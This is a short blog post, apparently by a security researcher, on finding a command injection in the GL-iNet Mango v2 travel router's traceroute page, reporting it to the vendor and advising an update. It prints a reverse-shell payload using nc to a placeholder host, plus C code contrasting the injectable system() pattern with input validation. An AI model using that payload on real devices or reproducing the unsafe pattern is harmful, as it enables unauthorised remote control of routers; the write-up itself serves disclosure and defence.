I had an hour or two to kill before a dentist appointment last summer, so I pulled out the GL-iNet Mango v2 Travel Router I had bought to hack on in just this type of situation. At $30 and about the size of a credit card, I figured I was bound to find something.
And boy, did it not take long. After opening up the firmware in Ghidra and searching for calls to system() as a first shot, I stumbled across traceroute functionality exposed to the web browser that appeared to be taking input directly from a POST parameter and executing the traceroute command with the IP address/domain name entered into the web form as an argument. While the web form’s URL was not linked to by anything in the administration portal, the /ping endpoint could be directly navigated to. Passing ; nc <ip> <port> -e /bin/ash as an IP address argument to traceroute created a reverse shell back to my machine.
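As an added illustration (this is not GL-iNet's firmware code, and the function names are hypothetical), here is the injection pattern described above next to a hardened handler that validates the host value and would invoke traceroute without ever going through a shell:

```c
/* Added example, not the router's code. Shows why pasting a POST parameter
 * into a system() command line is exploitable and how a handler avoids it. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern: the untrusted value is spliced into a shell command.
 * A value like "; nc <ip> <port> -e /bin/ash" terminates the traceroute
 * command and the shell runs whatever follows. The string is only returned
 * here, never handed to system(), so the example is safe to run. */
int build_cmd_unsafe(const char *host, char *out, size_t outlen) {
    return snprintf(out, outlen, "traceroute %s", host) < (int)outlen;
}

/* Hardened check: accept only characters a hostname or IP literal can
 * contain (letters, digits, '.', '-', ':'), bound the length, and reject a
 * leading '-' so the value can never be read as a traceroute option. */
int is_valid_host(const char *host) {
    size_t n = strlen(host);
    if (n == 0 || n > 253 || host[0] == '-') return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!isalnum(c) && c != '.' && c != '-' && c != ':') return 0;
    }
    return 1;
}

/* Hardened invocation: no shell involved. The validated value becomes one
 * argv element, so metacharacters have no meaning. This builds the argv only;
 * a real handler would fork() and execv(argv[0], (char *const *)argv). */
int build_argv_safe(const char *host, const char *argv[3]) {
    if (!is_valid_host(host)) return 0;
    argv[0] = "/usr/bin/traceroute";
    argv[1] = host;
    argv[2] = NULL;
    return 1;
}
```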
I reported the vulnerability immediately to GL-iNet, who were gracious and professional. Sadly, I was preëmpted by another guy by several weeks, so they already had a patch ready (we were still within the first guy’s disclosure window). But, they were kind enough to throw a credit my way as well when they announced the vulnerability on their blog.
So, on that note — if you own a GL-iNet travel router (this vulnerability affects a number of their products, not just the Mango v2) — be sure to update to at least version 3.215.